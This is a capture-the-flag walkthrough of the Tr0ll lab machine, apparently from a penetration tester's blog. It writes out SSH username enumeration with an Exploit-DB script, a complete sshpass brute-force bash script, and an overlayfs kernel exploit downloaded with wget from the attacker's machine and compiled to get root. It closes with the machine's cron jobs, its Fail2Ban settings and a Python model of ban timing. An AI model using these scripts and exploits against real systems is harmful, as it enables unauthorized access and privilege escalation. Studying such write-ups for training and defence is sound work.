Looks like we have an ELF binary. I'm not really interested in running it on my attacking machine, so I'll try to do some digging into it to see if it might contain any clues. First, I'll run strings on it...
root@kali:~/Walkthroughs/tr0ll# strings roflmao
/lib/ld-linux.so.2
libc.so.6
_IO_stdin_used
printf
__libc_start_main
__gmon_start__
GLIBC_2.0
PTRh
[^_]
Find address 0x0856BF to proceed
;*2$"
GCC: (Ubuntu 4.8.2-19ubuntu1) 4.8.2
.symtab
.strtab
.shstrtab
.interp
.note.ABI-tag
.note.gnu.build-id
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rel.dyn
.rel.plt
.init
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.jcr
.dynamic
.got
.got.plt
.data
.bss
.comment
crtstuff.c
__JCR_LIST__
deregister_tm_clones
register_tm_clones
__do_global_dtors_aux
completed.6590
__do_global_dtors_aux_fini_array_entry
frame_dummy
__frame_dummy_init_array_entry
roflmao.c
__FRAME_END__
__JCR_END__
__init_array_end
_DYNAMIC
__init_array_start
_GLOBAL_OFFSET_TABLE_
__libc_csu_fini
_ITM_deregisterTMCloneTable
__x86.get_pc_thunk.bx
data_start
printf@@GLIBC_2.0
_edata
_fini
__data_start
__gmon_start__
__dso_handle
_IO_stdin_used
__libc_start_main@@GLIBC_2.0
__libc_csu_init
_end
_start
_fp_hw
__bss_start
main
_Jv_RegisterClasses
__TMC_END__
_ITM_registerTMCloneTable
_init
There's only one string that stands out as interesting, "Find address 0x0856BF to proceed"... but what does that mean? I tried to see if that was an address in the binary itself using objdump, but it didn't return anything.
root@kali:~/Walkthroughs/tr0ll# objdump -D roflmao | grep -i 856BF
The hex string doesn't really convert to ASCII. The decimal value of the string is 546495. I checked to see if that might be a directory on the server, but it returned nothing. I decided to see if the hex string "as is" might be another "super secret directory" on the server...
root@kali:~/Walkthroughs/tr0ll# curl http://10.183.0.218/0x0856BF/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /0x0856BF</title>
</head>
<body>
<h1>Index of /0x0856BF</h1>
<table>
<tr><th valign="top"><img src="/icons/blank.gif" alt="[ICO]"></th><th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a></th></tr>
<tr><th colspan="5"><hr></th></tr>
<tr><td valign="top"><img src="/icons/back.gif" alt="[PARENTDIR]"></td><td><a href="/">Parent Directory</a></td><td> </td><td align="right"> - </td><td> </td></tr>
<tr><td valign="top"><img src="/icons/folder.gif" alt="[DIR]"></td><td><a href="good_luck/">good_luck/</a></td><td align="right">2014-08-12 23:59 </td><td align="right"> - </td><td> </td></tr>
<tr><td valign="top"><img src="/icons/folder.gif" alt="[DIR]"></td><td><a href="this_folder_contains_the_password/">this_folder_contains_the_password/</a></td><td align="right">2014-08-12 23:58 </td><td align="right"> - </td><td> </td></tr>
<tr><th colspan="5"><hr></th></tr>
</table>
<address>Apache/2.4.7 (Ubuntu) Server at 10.183.0.218 Port 80</address>
</body></html>
Sure enough! Another directory listing.
Each directory contains a TXT file. In the "good_luck" folder, we have a which_one_lol.txt file. In the "this_folder_contains_the_password" folder, we have a Pass.txt file. Downloading each, we have the following:
root@kali:~/Walkthroughs/tr0ll/10.183.0.218/0x0856BF/good_luck# cat which_one_lol.txt
maleus
ps-aux
felux
Eagle11
genphlux < -- Definitely not this one
usmc8892
blawrg
wytshadow
vis1t0r
overflow
And...
root@kali:~/Walkthroughs/tr0ll/10.183.0.218/0x0856BF/this_folder_contains_the_password# cat Pass.txt
Good_job_:)
Well, we have a list of words now. There seems to be some indication one of these words is the password. It is also possible one of these words is a username. We've only seen the username "anonymous" used on the FTP service (by us and in the lol.pcap file). The only other service to try to log in to is the SSH service. Before doing that, though, we need to figure out some usernames. Maybe we can use one of the "Username Enumeration" scripts in the exploit database.
OpenSSH 2.3 < 7.7 - Username Enumeration | exploits/linux/remote/45233.py
OpenSSH 2.3 < 7.7 - Username Enumeration (PoC) | exploits/linux/remote/45210.py
OpenSSH < 7.7 - User Enumeration (2) | exploits/linux/remote/45939.py
I'll start with the "newest" exploit (highest number). I'll copy it to my working directory and see what the script parameters are.
root@kali:~/Walkthroughs/tr0ll# cp /usr/share/exploitdb/exploits/linux/remote/45939.py .
root@kali:~/Walkthroughs/tr0ll# python 45939.py
usage: 45939.py [-h] [-p PORT] target username
SSH User Enumeration by Leap Security (@LeapSecurity)
positional arguments:
target IP address of the target system
username Username to check for validity.
optional arguments:
-h, --help show this help message and exit
-p PORT, --port PORT Set port of SSH service
Looks like we just need to pass it a target and username. It doesn't seem to handle a list of usernames, so we'll have to run it in a loop to check multiple. We'll start by checking to see if any of the entries in our wordlists are valid usernames.
root@kali:~/Walkthroughs/tr0ll# for word in $(cat wordlist)
> do
> python 45939.py 10.183.0.218 "$word"
> done
[+] maleus is a valid username
[+] ps-aux is a valid username
[+] felux is a valid username
[+] Eagle11 is a valid username
[+] genphlux is a valid username
[+] usmc8892 is a valid username
[+] blawrg is a valid username
[+] wytshadow is a valid username
[+] vis1t0r is a valid username
[+] overflow is a valid username
[-] Good_job_:) is an invalid username
Looks like all the words in the "which_one_lol.txt" file are valid usernames. I tried to run hydra against the SSH service using our wordlist for both usernames and passwords. Unfortunately, no valid combinations were detected. 😞
hydra -o ssh-crack -t 4 -L wordlist -u -e nsr -P wordlist ssh://10.183.0.218
However, it looks like the SSH service is pretty sensitive to brute force attacks. Using the following script...
for i in $(seq 1 120); do echo $i `python 45939.py 10.183.0.218 test 2>/dev/null`; sleep 1; done
...I was able to determine that the service locks down after 6 failed login attempts and won't let you connect for ~60 seconds.
Instead of hydra, I decided to create a bash script that would use sshpass to try to log in to the SSH service. I have several valid usernames to try. Now I need to create a password wordlist. To build the wordlist, I combined both TXT files we downloaded, plus the names of the files, plus some of the other strings we've seen so far. Hopefully something we've come across so far will be a valid password.
root@kali:~/Walkthroughs/tr0ll# cat wordlist
maleus
ps-aux
felux
Eagle11
genphlux
usmc8892
blawrg
wytshadow
vis1t0r
overflow
Good_job_:)
which_one_lol.txt
which_one_lol
Pass.txt
Pass
good_luck
this_folder_contains_the_password
0x0856BF
Find address 0x0856BF to proceed
roflmao
sup3rs3cr3tdirlol
secret
hacker
troll
tr0ll
I also inverted the list of usernames we were given. It is pretty common in these challenges for the "right" thing you need to be at the bottom of the list. I used the "tac" command to reverse the order.
root@kali:~/Walkthroughs/tr0ll# tac usernames > usernames-reverse
root@kali:~/Walkthroughs/tr0ll# cat usernames-reverse
overflow
vis1t0r
wytshadow
blawrg
usmc8892
genphlux
Eagle11
felux
ps-aux
maleus
Here's the script I used to loop through each username and password.
root@kali:~/Walkthroughs/tr0ll# cat ssh-brute.sh
#!/bin/bash
# allow glob matching in case statement
shopt -s extglob
# define colors
RED='\033[0;31m'
GREEN='\033[0;32m'
ORANGE='\033[0;33m'
CYAN='\033[0;36m'
NC='\033[0m'
# perform login attempt and check response
function login_attempt() {
    RESPONSE=$(sshpass -p "$2" ssh $1@10.183.0.218 'exit' 2>&1)
    case "$RESPONSE" in
        *Connection*)
            print_warn "Sleeping 10 seconds..."
            sleep 10
            return 1
            ;;
        *Permission*)
            print_fail "$1 : $2"
            return 0
            ;;
        *)
            print_success "$1 : $2"
            print_info "$RESPONSE"
            exit
            ;;
    esac
}
# add pretty print functions
function print_info { echo -e "${CYAN}[?]${NC} $1"; }
function print_warn { echo -e "${ORANGE}[*]${NC} $1"; }
function print_fail { echo -e "${RED}[-]${NC} $1"; }
function print_success { echo -e "${GREEN}[+]${NC} $1"; }
# load usernames from list
USERS=($(cat usernames-reverse))
print_info "Loaded ${#USERS[@]} users from wordlist"
# load words from wordlist
WORDS=($(cat wordlist))
print_info "Loaded ${#WORDS[@]} words from wordlist"
# start trying username/password combinations
for username in "${USERS[@]}"; do
    for password in "${WORDS[@]}"; do
        until login_attempt "$username" "$password"; do : ; done
    done
done
Running the script...
root@kali:~/Walkthroughs/tr0ll# ./ssh-brute.sh
[?] Loaded 10 users from wordlist
[?] Loaded 29 words from wordlist
[-] overflow : maleus
[-] overflow : ps-aux
[-] overflow : felux
[-] overflow : Eagle11
[-] overflow : genphlux
[-] overflow : usmc8892
[-] overflow : blawrg
[*] Sleeping 10 seconds...
[*] Sleeping 10 seconds...
[*] Sleeping 10 seconds...
[*] Sleeping 10 seconds...
[*] Sleeping 10 seconds...
[*] Sleeping 10 seconds...
[-] overflow : wytshadow
[-] overflow : vis1t0r
[-] overflow : overflow
[-] overflow : Good_job_:)
[-] overflow : which_one_lol.txt
[-] overflow : which_one_lol
[*] Sleeping 10 seconds...
[*] Sleeping 10 seconds...
[*] Sleeping 10 seconds...
[*] Sleeping 10 seconds...
[*] Sleeping 10 seconds...
[*] Sleeping 10 seconds...
[*] Sleeping 10 seconds...
[+] overflow : Pass.txt
[?] Could not chdir to home directory /home/overflow: No such file or directory
Looks like we found a valid username/password combination. 😄 I guess, quite literally, the "this_folder_contains_the_password" folder contained the password... Pass.txt.
Let's try to log in with the overflow account.
root@kali:~/Walkthroughs/tr0ll# ssh overflow@10.183.0.218
overflow@10.183.0.218's password:
Welcome to Ubuntu 14.04.1 LTS (GNU/Linux 3.13.0-32-generic i686)
* Documentation: https://help.ubuntu.com/
New release '16.04.6 LTS' available.
Run 'do-release-upgrade' to upgrade to it.
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
Last login: Mon May 20 10:55:11 2019 from kali.homenet.dom
Could not chdir to home directory /home/overflow: No such file or directory
$ id
uid=1002(overflow) gid=1002(overflow) groups=1002(overflow)
Broadcast Message from root@trol
(somewhere) at 11:05 ...
TIMES UP LOL!
Connection to 10.183.0.218 closed by remote host.
Connection to 10.183.0.218 closed.
We're in! Briefly! Looks like we are going to get booted every so often. Doing some testing, the /tmp directory gets cleared and any processes we start are killed as well. This will be fun.
Maintaining Access
N/A
Privilege Escalation
Checking the installed kernel and operating system...
$ uname -a
Linux troll 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:12 UTC 2014 i686 i686 i686 GNU/Linux
$ cat /etc/os*
NAME="Ubuntu"
VERSION="14.04.1 LTS, Trusty Tahr"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 14.04.1 LTS"
VERSION_ID="14.04"
HOME_URL="http://www.ubuntu.com/"
SUPPORT_URL="http://help.ubuntu.com/"
BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/"
$ cat /etc/issue*
Ubuntu 14.04.1 LTS \n \l
Ubuntu 14.04.1 LTS
We have a well-known exploit we've had success using in the past.
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege Escalation | exploits/linux/local/37292.c
I'll copy the exploit to my working directory and then serve it up to the victim using python's SimpleHTTPServer.
root@kali:~/Walkthroughs/tr0ll# cp /usr/share/exploitdb/exploits/linux/local/37292.c .
root@kali:~/Walkthroughs/tr0ll# python -m SimpleHTTPServer 4321
Serving HTTP on 0.0.0.0 port 4321 ...
10.183.0.218 - - [20/May/2019 13:23:18] "GET /37292.c HTTP/1.1" 200 -
Then, on the victim...
$ cd /tmp
$ wget -O 37292.c 10.183.0.222:4321/37292.c
--2019-05-20 11:23:19-- http://10.183.0.222:4321/37292.c
Connecting to 10.183.0.222:4321... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5119 (5.0K) [text/plain]
Saving to: '37292.c'
100%[============================================================================================================>] 5,119 --.-K/s in 0s
2019-05-20 11:23:19 (427 MB/s) - '37292.c' saved [5119/5119]
$ gcc -o pwn 37292.c
$ ./pwn
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# ls /root
proof.txt
# cat /root/proof.txt
Good job, you did it!
702a8c18d29c6f3ca0d99ef5712bfbdc
Nice! We had to work fast, but we got root... and the proof.txt file.
Pivoting
N/A
Clean Up
We'll let the "cleaner" clean up after us. 😄
Additional Info
Cleaner
Checking in root's crontab, we see the scripts that are running to boot us and clean up after us.
NOTE: The crontab file itself is saved at /var/spool/cron/crontabs/root.
# crontab -l
# Edit this file to introduce tasks to be run by cron.
#
# Each task to run has to be defined through a single line
# indicating with different fields when the task will be run
# and what command to run for the task
#
# To define the time you can provide concrete values for
# minute (m), hour (h), day of month (dom), month (mon),
# and day of week (dow) or use '*' in these fields (for 'any').#
# Notice that tasks will be started based on the cron's system
# daemon's notion of time and timezones.
#
# Output of the crontab jobs (including errors) is sent through
# email to the user the crontab file belongs to (unless redirected).
#
# For example, you can run a backup of all your user accounts
# at 5 a.m every week with:
# 0 5 * * 1 tar -zcf /var/backups/home.tgz /home/
#
# For more information see the manual pages of crontab(5) and cron(8)
#
# m h dom mon dow command
*/5 * * * * /usr/bin/python /opt/lmao.py
*/2 * * * * /usr/bin/python /lib/log/cleaner.py
The lmao.py file contains the following...
root@troll:/# cat /opt/lmao.py
#!/usr/bin/env python
import os
os.system('echo "TIMES UP LOL!"|wall')
os.system("pkill -u 'overflow'")
sys.exit()
The cleaner.py file contains the following...
root@troll:/# cat /lib/log/cleaner.py
#!/usr/bin/env python
import os
import sys
try:
    os.system('rm -r /tmp/* ')
except:
    sys.exit()
Fail2Ban
Fail2Ban was being used to block our SSH attempts after 6 failed logins. Thankfully the default "bantime" was only 60 seconds.
root@troll:~# cat /etc/fail2ban/jail.local
# Fail2Ban configuration file.
#
# This file was composed for Debian systems from the original one
# provided now under /usr/share/doc/fail2ban/examples/jail.conf
# for additional examples.
#
# Comments: use '#' for comment lines and ';' for inline comments
#
# To avoid merges during upgrades DO NOT MODIFY THIS FILE
# and rather provide your changes in /etc/fail2ban/jail.local
#
# The DEFAULT allows a global definition of the options. They can be overridden
# in each jail afterwards.
[DEFAULT]
# "ignoreip" can be an IP address, a CIDR mask or a DNS host. Fail2ban will not
# ban a host which matches an address in this list. Several addresses can be
# defined using space separator.
ignoreip = 127.0.0.1/8
# "bantime" is the number of seconds that a host is banned.
bantime = 60
# A host is banned if it has generated "maxretry" during the last "findtime"
# seconds.
findtime = 600
maxretry = 3
[...snip...]
[ssh]
enabled = true
port = ssh
filter = sshd
logpath = /var/log/auth.log
maxretry = 6
[...snip...]
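To put numbers on the jail settings above (maxretry = 6, findtime = 600, bantime = 60), the following added example, which is not Fail2Ban's code and not part of the original walkthrough, models the ban logic and counts how many failed logins from one source still reach sshd in an hour for several bantime values. The model is a simplification with labelled assumptions, the attempt times are constructed, and the function names are made up for this example.

```python
from collections import deque


def simulate_jail(attempt_times, maxretry, findtime, bantime):
    """Return (failures that reached sshd, list of (ban_start, ban_end)).

    Simplified model (assumptions, not Fail2Ban's implementation): every
    attempt that reaches sshd is a failed login, attempts made during a ban
    are dropped by the firewall and never logged, and the failure window for
    the source is cleared when a ban is issued.
    """
    window = deque()       # times of recent logged failures
    banned_until = None
    reached, bans = 0, []
    for t in sorted(attempt_times):
        if banned_until is not None and t < banned_until:
            continue                       # dropped before sshd sees it
        reached += 1
        window.append(t)
        while window and t - window[0] > findtime:
            window.popleft()               # failure aged out of findtime
        if len(window) >= maxretry:
            banned_until = t + bantime
            bans.append((t, banned_until))
            window.clear()
    return reached, bans


# Constructed input: one source retrying once per second for an hour.
ONE_HOUR = range(3600)


def compare(bantimes, maxretry=6, findtime=600):
    """Failed logins admitted in ONE_HOUR for each candidate bantime."""
    return {b: simulate_jail(ONE_HOUR, maxretry, findtime, b)[0] for b in bantimes}


if __name__ == '__main__':
    for bantime, admitted in compare([60, 600, 3600]).items():
        print(f'bantime={bantime:>4}s -> {admitted} failed logins reach sshd per hour')
```

With the jail's values the ban only pauses the source for about a minute at a time, which matches the lockout behaviour observed earlier; a longer bantime is what actually reduces the number of guesses that reach the service.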